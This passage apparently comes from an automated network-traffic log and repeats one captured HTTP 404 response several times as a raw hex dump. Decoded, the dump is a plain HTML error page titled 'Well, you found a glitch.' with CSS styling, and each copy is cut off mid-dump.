2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
